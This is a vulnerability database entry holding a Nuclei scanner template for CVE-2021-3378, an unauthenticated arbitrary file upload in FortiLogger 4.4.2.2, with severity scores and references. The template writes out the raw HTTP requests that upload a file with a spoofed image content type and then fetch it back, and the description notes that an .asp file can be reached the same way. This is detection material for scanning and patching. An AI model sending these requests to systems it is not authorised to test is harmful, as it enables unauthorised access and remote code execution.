Lucene search

ProjectDiscoveryNUCLEI:CVE-2021-3378

HistoryMar 01, 2021 - 12:32 a.m.

FortiLogger 4.4.2.2 - Arbitrary File Upload

2021-03-0100:32:59

ProjectDiscovery

github.com

cve

cve2021

fortilogger

fortigate

fortinet

packetstorm

fileupload

intrusive

arbitrary

exploit

vulnerability

remediation

securitypatch

unauthorizedaccess

remotecodeexecution

systemcompromise

multipartformdata

config

assets

temp

hotspot

logoupload.

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.5

Confidence

High

EPSS

0.745

Percentile

98.2%

JSON

FortiLogger 4.4.2.2 is affected by arbitrary file upload issues. Attackers can send a "Content-Type: image/png" header to Config/SaveUploadedHotspotLogoFile and then Assets/temp/hotspot/img/logohotspot.asp.

id: CVE-2021-3378

info:
  name: FortiLogger 4.4.2.2 - Arbitrary File Upload
  author: dwisiswant0
  severity: critical
  description: |
    FortiLogger 4.4.2.2 is affected by arbitrary file upload issues. Attackers can send a "Content-Type: image/png" header to Config/SaveUploadedHotspotLogoFile and then Assets/temp/hotspot/img/logohotspot.asp.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, and potential compromise of the affected system.
  remediation: |
    Apply the latest security patch or upgrade to a patched version of FortiLogger to mitigate this vulnerability.
  reference:
    - https://erberkan.github.io/2021/cve-2021-3378/
    - https://github.com/erberkan/fortilogger_arbitrary_fileupload
    - http://packetstormsecurity.com/files/161601/FortiLogger-4.4.2.2-Arbitrary-File-Upload.html
    - http://packetstormsecurity.com/files/161974/FortiLogger-Arbitrary-File-Upload.html
    - https://github.com/SYRTI/POC_to_review
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-3378
    cwe-id: CWE-434
    epss-score: 0.46039
    epss-percentile: 0.97333
    cpe: cpe:2.3:a:fortilogger:fortilogger:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: fortilogger
    product: fortilogger
  tags: cve,cve2021,fortilogger,fortigate,fortinet,packetstorm,fileupload,intrusive

http:
  - raw:
      - |
        POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
        Accept: application/json
        Referer: {{BaseURL}}
        Connection: close
        X-Requested-With: XMLHttpRequest

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="file"; filename="poc.txt"
        Content-Type: image/png

        {{randstr}}

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
      - |
        GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "{{randstr}}"

      - type: word
        part: header
        words:
          - "text/plain"
          - "ASP.NET"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009ca6ec31fff128d598adf60dee1493944a7ab52755ca4f6499b9c9e753b6527d02210099391061cf59dbd9935b6a7d1a7083e8452a818b33747499e433c09616fb636e:922c64590222798bb761d5b6d8e72950